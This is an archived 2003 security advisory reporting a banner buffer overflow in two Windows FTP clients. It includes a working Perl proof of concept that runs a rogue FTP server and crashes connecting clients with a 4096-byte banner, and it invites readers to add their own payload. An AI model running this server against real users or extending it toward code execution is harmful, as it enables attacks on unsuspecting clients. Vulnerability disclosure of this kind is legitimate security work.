what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ftp_banner.txt

ftp_banner.txt
Posted Feb 4, 2003
Authored by Dennis Rand | Site infowarfare.dk

Both the 32 FTP Client version p9.49.01 and ByteCatcher FTP Client V1.04b are susceptible to being crashed due to a large banner. Arbitrary code execution against the client may be possible.

tags | exploit, arbitrary, code execution
SHA-256 | dbd4fb324ffcac9ecb0d8c4f98982a0eb9e3c1f0b1ca20e8533d6773e2440c31

ftp_banner.txt

Change Mirror Download
                   Banner Buffer Overflows found in 
Multible FTP Clients


Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------

SUMMARY
A client side vulnerability in the product allows remote servers to cause the
client
to crash by sending it a large banner.

32bit FTP Client has currently been downloaded 19,330 times from
www.downloads.com
ByteCatcher FTP Client has currently been downloaded 169,912 times from
www.downloads.com

DETAILS


Vulnerable systems:
* 32bit FTP Client version p9.49.01
ByteCatcher FTP Client V1.04b

Immune systems:
* 32bit FTP p9.50.01
ByteCatcher FTP Client V1.04b

It's possible to crash theise FTP Clients by sending long (4096 bytes) FTP
banner to it.
The other more dangerous problem could be that this can be used to execute
arbitrary code,
on the users machine.
The following transcript demonstrates a sample exploitation of the
vulnerabilities, only to the point that we will kill the client, it is up to
you to put in
the evil evil code =)


#!/usr/bin/perl
######################################################
#
# Affected systems:
# 32bit FTP Client version p9.49.01
# ByteCatcher FTP Client V1.04b
# Possible many other clients, got this problem to
#
# http://www.infowarfare.dk
#
# Dennis Rand - Matrix@infowarfare.dk
#
# When FTP client connects to this server they will CRASH
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
#
#
#######################################################
use IO::Socket;
$port = "21";
$data = "a";
$num = "4096";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse
=> 1, Listen => 2)
or die "Couldn't create tcp-server.\n";
while ($client = $server->accept()) {
print "Client connected.\n";
print "Attacking...";
print $client "$buf";
print "OK\n";
close($client);
}

Detection:
32bit FTP Client version p9.49.01 and ByteCatcher FTP Client V1.04b
is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.

Vendor response:


Disclosure timeline:
04/01/2003 Found the Vulnerability.
04/01/2003 Author notified.
01/02/2003 Responses received
04/02/2003 Public Disclosure.


ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:matrix@infowarfare.dk> Dennis Rand

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect,
incidental, consequential, loss of business profits or special damages.




-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close